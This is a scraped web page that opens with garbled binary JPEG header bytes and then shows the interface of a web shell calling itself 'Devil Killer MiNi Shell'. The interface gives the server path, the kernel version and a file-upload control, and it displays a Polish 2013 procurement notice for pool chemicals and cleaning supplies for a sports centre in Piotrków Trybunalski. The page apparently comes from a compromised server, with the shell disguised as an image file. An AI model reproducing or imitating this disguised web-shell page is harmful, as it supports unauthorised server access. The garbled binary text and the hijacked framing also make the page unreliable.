JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130109/13564-N-2013.html

<p class="kh_header"><b>Piotrków Trybunalski: SUKCESYWNA  DOSTAWA  PRODUKTÓW 
I ŚRODKÓW CHEMICZNYCH DO UTRZYMANIA  CZYSTOŚCI 
 W OBIEKTACH  OŚRODKA  SPORTU  I  REKREACJI   
W   PIOTRKOWIE  TRYBUNALSKI</b><br>
<b>Numer ogłoszenia: 13564 - 2013; data zamieszczenia: 09.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji , al. 3 Maja 6b, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7326569, 7326651, faks 044 7325733.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA  DOSTAWA  PRODUKTÓW 
I ŚRODKÓW CHEMICZNYCH DO UTRZYMANIA  CZYSTOŚCI 
 W OBIEKTACH  OŚRODKA  SPORTU  I  REKREACJI   
W   PIOTRKOWIE  TRYBUNALSKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
DOTYCZY: CZĘŚĆ 1 
Przedmiotem zamówienia jest - SUKCESYWNA DOSTAWA ŚRODKÓW CHEMICZNYCH DO UZDATNIANIA WODY BASENOWEJ DLA POTRZEB  KRYTYCH PŁYWALNI MIESZCZĄCYCH SIĘ PRZY ULICACH BELZACKIEJ 106 I  PRÓCHNIKA 8/12 OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM.  
objętej kodem:  
CPV: 24962000 - 5 (chemikalia do uzdatniania wody)   
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA: 
1. Całkowite zapotrzebowanie na  dostawę środków chemicznych  do uzdatniania wody basenowej (zwanych dalej środkami chemii basenowej) dla potrzeb Krytych Pływalni przy ul. Belzackiej 106 i ul. Próchnika 8/12 przedstawia Kosztorys Ofertowy 
2. Środki chemii basenowej winny  posiadać własności chemiczne gwarantujące wysoką jakość i spełnienie obowiązujących norm. 
3. Dostawę środków chemii basenowej należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy środków chemii basenowej nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Każdy ze środków chemii basenowej winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 1.
6. W przypadku wątpliwości co do jakości środków chemii basenowej Zamawiający zleci wykonanie badań środków chemii basenowej w uprawnionym laboratorium. W razie stwierdzenia niezgodności z obowiązującymi normami kosztami badania laboratoryjnego zostanie obciążony Wykonawca dostawy środków chemii basenowej. 7. Wykonawca  poniesie koszty wymiany wody w nieckach basenowych  w przypadku, gdy zostanie stwierdzona niezgodność dostarczonych i użytych środków chemii basenowej z obowiązującymi w tym zakresie normami. 
8. W przypadku, gdy Zamawiający zmuszony zostanie do zamknięcia Krytej Pływalni przy ul. Belzackiej 106 i (lub) przy ul. Próchnika 8/12 z winy leżącej po stronie Wykonawcy,  m.in. z powodu opóźnienia w dostawie środków chemii basenowej lub dostarczenia środków chemii basenowej o złej jakość, to Wykonawca  zapłaci karę za każdy dzień przestoju z tytułu utraconych korzyści przez Zamawiającego (z tytułu świadczenia usług oferowanych przez Zamawiającego na obiektach Krytych Pływalni) w wysokości określonej w § 5 istotnych postanowieniach umowy.
 9. Podane w Kosztorysie Ofertowym Część 1 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 1 będącym załącznikiem  nr 2 do  umowy, które są niezmienne przez cały okres obowiązywania umowy. 
10. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości środków chemii basenowej, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część  1, określającym ilości środków chemii basenowej oraz ceny jednostkowe. 
11. Dostawa, transport i rozładunek środków chemii basenowej odbywać się będzie na koszt i ryzyko Wykonawcy do obiektów Zamawiającego:    
- Kryta Pływalnia przy ul. Belzackiej 106 w Piotrkowie Trybunalskim,    
- Kryta Pływalnia przy ul. Próchnika 8/12 w Piotrkowie Trybunalskim, 
12. Wykonawca zobowiązuje się dostarczyć środki chemii basenowej jako produkty nowe w oryginalnych, fabrycznie zamkniętych opakowaniach, w pojemnikach o maksymalnym ciężarze 25 kg, przystosowanych do transportu i przechowywania chemikaliów, z etykietami w języku polskim, z minimum 3 miesięcznym okresem przydatności do zużycia od daty dostawy, posiadający świadectwo jakości producenta. 
13. Wykonawca zobowiązany jest posiadać w okresie realizacji umowy aktualne, wymagane prawem atesty higieniczne, pozwolenia czy instrukcje dopuszczające zaoferowane środki chemii basenowej do powszechnego użytku. 
14. Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych środków chemii basenowej.  
WYKONAWCA DOSTAWY: 
1. zapewni dostawę środków chemii basenowej, która winna  posiadać własności chemiczne  gwarantujące odpowiednią jakość i spełnianie obowiązujących norm, 
2. wraz z dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu złoży karty charakterystyki każdego środka chemii basenowej oraz pozwolenie na obrót preparatami biobójczymi lub ich kopie potwierdzone przez Wykonawcę za zgodność z oryginałem, 
3. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
4. do każdorazowej dostawy środków chemii basenowej Wykonawca dostarczy dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
5. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 66.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanych środków chemii basenowej i wartości całości zamówienia,
6. wymaganym jest, aby kierowca posiadał pozwolenie ADR uprawniające go do przewozu niebezpiecznych środków, 
7. wymaganym jest, aby transport środków chemii basenowej odbywał się samochodem przystosowanym do przewozu niebezpiecznych substancji chemicznych.

 
DOTYCZY: CZĘŚĆ 2  
Przedmiotem zamówienia jest - SUKCESYWNA DOSTAWA ŚRODKÓW CHEMICZNYCH DO  UTRZYMANIA CZYSTOŚCI POMIESZCZEŃ MOKRYCH -  SZATNI,  NATRYSKÓW, SANITARIATÓW   W OBIEKTACH OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM. 
objętej kodem  
CPV: 39831240 - 0 (preparaty czyszczące) 
CPV: 39831250 - 3 (roztwory myjące) 
CPV: 39831600 - 2 (środki do czyszczenia toalet)  
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA: 
1. Całkowite zapotrzebowanie na  środki chemiczne do utrzymania czystości pomieszczeń mokrych - szatni, natrysków, sanitariatów (zwanych dalej środkami chemicznymi) przedstawia Kosztorys Ofertowy Część 2. 
2. Środki chemiczne winny  posiadać własności chemiczne gwarantujące wysoką jakość, spełnienie obowiązujących norm i ulegać biodegradacji. 
3. Dostawę środków chemicznych należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy środków chemicznych nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Każdy ze środków chemicznych winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 2. 
6. Podane w Kosztorysie Ofertowym Część 2 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 2 będącym załącznikiem Nr 2 do umowy, które są niezmienne przez cały okres obowiązywania umowy. 
7. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości środków chemicznych, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 2, określającym ilości środków chemicznych oraz ceny jednostkowe. 
8.  Dostawa, transport i rozładunek środków chemicznych odbywać się będzie, do obiektu Zamawiającego - Kryta Pływalnia przy ul. Belzackiej 106 w Piotrkowie Trybunalskim na koszt i ryzyko Wykonawcy. 
9. Wykonawca zobowiązuje się dostarczyć środki chemiczne jako produkty nowe, w oryginalnych, fabrycznie zamkniętych  opakowaniach, w pojemnikach przystosowanych do transportu i przechowywania chemikaliów, z etykietami w języku polskim, z minimum 3 miesięcznym okresem przydatności do zużycia od daty dostawy, posiadający świadectwo jakości producenta. 
10. Wykonawca zobowiązany jest posiadać w okresie realizacji umowy aktualne, wymagane prawem atesty higieniczne, pozwolenia czy instrukcje dopuszczające zaoferowane środki chemiczne do powszechnego użytku. 
11.  Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych środków chemicznych.  
WYKONAWCA DOSTAWY: 
1. zapewni dostawę środków chemicznych, które winny posiadać własności chemiczne gwarantujące odpowiednią jakość i spełnianie obowiązujących norm oraz powinny ulegać całkowitej biodegradacji,  
2. wraz z dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu złoży karty charakterystyki każdego środka chemicznego lub ich kopie potwierdzone przez Wykonawcę za zgodność z oryginałem, 
3. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
4.  do każdorazowej dostawy  środków chemicznych Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
5.  przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 40.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw,  potwierdzenia jakości dostarczanych środków chemicznych i wartości całości zamówienia. 


DOTYCZY: CZĘŚĆ 3  
Przedmiotem zamówienia jest - SUKCESYWNA DOSTAWA PRODUKTÓW DO MYCIA OKIEN I PODŁÓG KRYTYCH PŁYWALNI MIESZCZĄCYCH SIĘ PRZY ULICACH BELZACKA 106 I PRÓCHNIKA 8/12 OŚRODKA SPORTU  I REKREACJI W PIOTRKOWIE TRYBUNALSKIM.  
objętych kodem: 
CPV: 39224000 - 8 (miotły i szczotki i inne artykuły różnego rodzaju)  
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA: 
1. Całkowite zapotrzebowanie na dostawę produktów do mycia okien i podłóg (zwanych dalej produktami) w Krytych Pływalniach mieszczących się przy ulicach Belzacka 106 i Próchnika 8/12 Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim przedstawia Kosztorys Ofertowy Część 3. 
2. Produkty winny charakteryzować  się wysoką jakością. 
3. Dostawę produktów należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy produktów nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Podane w Kosztorysie Ofertowym Część 3 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 3, będącym załącznikiem Nr 2 do umowy, które są niezmienne przez cały okres obowiązywania umowy. 
6. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości produktów, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 3, określającym ilości produktów oraz ceny jednostkowe. 
7.  Dostawa, transport i rozładunek produktów odbywać się będzie, do obiektu Krytej Pływalni przy ul. Belzackiej 106 w Piotrkowie Trybunalskim na koszt i ryzyko Wykonawcy. 
8. Wykonawca zobowiązuje się dostarczyć produkty nowe, w oryginalnych opakowaniach. 
9.  Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych produktów.  
WYKONAWCA USŁUGI: 
1. dostarczy produkty odpowiedniej jakość i  spełniające obowiązujące normy,  
2. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
3. do każdorazowej dostawy  produktów Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
4. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 18.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanych produktów  i wartości całości zamówienia.    


DOTYCZY: CZĘŚĆ 4  
Przedmiotem zamówienia jest - SUKCESYWNA DOSTAWA ŚRODKÓW DO UTRZYMANIA  CZYSTOŚCI  POMIESZCZEŃ  W  OBIEKTACH  OŚRODKA  SPORTU  I  REKREACJI  W  PIOTRKOWIE  TRYBUNALSKIM.  
objętej kodem: 
CPV: 39224000 - 8 (miotły i szczotki i inne artykuły różnego rodzaju) 
CPV: 33760000 - 5 (papiery toaletowe, chusteczki higieniczne, ręczniki do rąk i serwety)  
CPV: 39224330 - 0 (wiadra)
CPV: 39224340 - 3 (kosze) 
CPV: 39812400 - 1 (zmiotki) 
CPV: 33711900 - 6 (mydło) 
CPV: 39800000 - 0 (środki czyszczące i polerujące) 
CPV: 39831000 - 6 (preparaty piorące) 
CPV: 39811100 - 1 (odświeżacze powietrza)   
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA:  
1. Całkowite zapotrzebowanie na dostawę środków do utrzymania czystości pomieszczeń (zwane dalej produktami) w obiektach OSiR przedstawia Kosztorys Ofertowy Część 4. 
2. Produkty winny posiadać wysoką jakość, spełniać obowiązujące normy i ulegać biodegradacji. 
3. Dostawę produktów należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy produktów nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego.
5. Każdy z produktów winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 4. 
6. Podane w Kosztorysie Ofertowym Część 4 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 4, będącym załącznikiem Nr 2 do umowy, które są niezmienne przez cały okres obowiązywania umowy. 
7. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości produktów, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 4, określającym ilości produktów oraz ceny jednostkowe. 
8.  Dostawa, transport i rozładunek produktów do utrzymania czystości odbywać się będzie do obiektów Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim:       
- Hala Relax Al. 3 Maja 6 B,       
- Centrum Rekreacyjno - Rehabilitacyjne ul. Belzacka 108/110,       - Korty Ziemne ul. Belzacka 108/110,
- Kąpielisko Miejskie Słoneczko  - Bugaj,
- Kryta Pływalnia ul. Belzacka 106,       
- Kryta Pływalnia  ul. Próchnika 8/12,      
- Stadion Miejski ul. Żwirki 6,       
- Lodowisko Miejskie/Korty Tenisowe w Parku Miejskim ul. Żeromskiego 22,
- Boisko Sportowe ul. Broniewskiego 18      
na koszt i ryzyko Wykonawcy. 
9. Wykonawca zobowiązuje się dostarczyć produkty nowe, w oryginalnych opakowaniach, w pojemnikach przystosowanych do transportu i przechowywania chemikaliów,  z  etykietami  w  języku  polskim,  z  minimum  3  miesięcznym  okresem 
przydatności do zużycia od daty dostawy, posiadający świadectwo jakości producenta. 
10. Wykonawca zobowiązany jest posiadać w okresie realizacji umowy aktualne, wymagane prawem atesty higieniczne, pozwolenia czy instrukcje dopuszczające zaoferowane produkty do powszechnego użytku. 
11. Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych produktów.  
WYKONAWCA USŁUGI:  
1. dostarczy produkty, które winny  posiadać własności chemiczne  gwarantujące odpowiednią jakość i spełnianie obowiązujących norm,  
2. wraz z dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu złoży karty charakterystyki każdej substancji lub ich kopie potwierdzone przez Wykonawcę za zgodność z oryginałem, 
3. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
4. do każdorazowej dostawy  produktów Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
5. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 51.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanych środków do utrzymania czystości i wartości całości zamówienia.

  
DOTYCZY: CZĘŚĆ 5  
Przedmiotem zamówienia jest - SUKCESYWNA DOSTAWA PŁYNU  DO   MYCIA NAWIERZCHNI  HALI  RELAX  OŚRODKA SPORTU  I REKREACJI W PIOTRKOWIE TRYBUNALSKIM.  
objętych kodem: 
CPV: 39831300 - 9 (środki do czyszczenia podłóg) 
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA: 
1. Całkowite zapotrzebowanie na dostawę płynu do mycia nawierzchni hali Relax (zwany dalej płynem) Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim przedstawia Kosztorys Ofertowy Część 5. 
2. Płyn winien charakteryzować  się wysoką jakością. 
3. Dostawę płynu należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy płynu nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Płyn winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 5.
6. Podana w Kosztorysie Ofertowym Część 5 ilość jest wielkością maksymalną, założoną do zamówienia, dostawa płynu następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg ceny jednostkowej podanej w Kosztorysie Ofertowym Część 5, będącym załącznikiem Nr 2 do umowy, która jest niezmienna przez cały okres obowiązywania umowy. 
7. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości płynu, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 5, określającym ilość płynu oraz cenę jednostkową. 
8.  Dostawa, transport i rozładunek płynu odbywać się będzie, do obiektu Hala RELAX przy al. 3 Maja 6B w Piotrkowie Trybunalskim na koszt i ryzyko Wykonawcy. 
9. Wykonawca zobowiązuje się dostarczyć płyn nowy, w oryginalnych opakowaniach. 
10.  Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonego płynu.  
WYKONAWCA USŁUGI: 
1. dostarczy płyn odpowiedniej jakość i  spełniający obowiązujące normy,  
2. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
3. do każdorazowej dostawy  płynu  Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
4. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 9.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw,  potwierdzenia jakości dostarczanego płynu i wartości całości zamówienia.
Szczegółowy zakres, ilość, wyszczególnienie znajdują się w Kosztorysach Ofertowych odpowiednio do części 1,2,3,4,5.


Wykonawca będzie odpowiedzialny za jakość przedmiotu zamówienia, jego zgodność 
z warunkami technicznymi i jakościowymi.
Zamawiający wymaga należytej staranności przy realizacji niniejszego zamówienia.
Ustalenia i decyzje dotyczące wykonywania niniejszego zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone Zamawiającemu lub osobom trzecim przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.96.20.00-5, 39.83.12.40-0, 39.83.12.50-3, 39.83.16.00-2, 39.22.40.00-8, 33.76.00.00-5, 39.22.43.30-0, 39.22.43.40-3, 39.81.24.00-1, 33.71.19.00-6, 39.80.00.00-0, 39.83.10.00-6, 39.81.11.00-1, 39.83.13.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
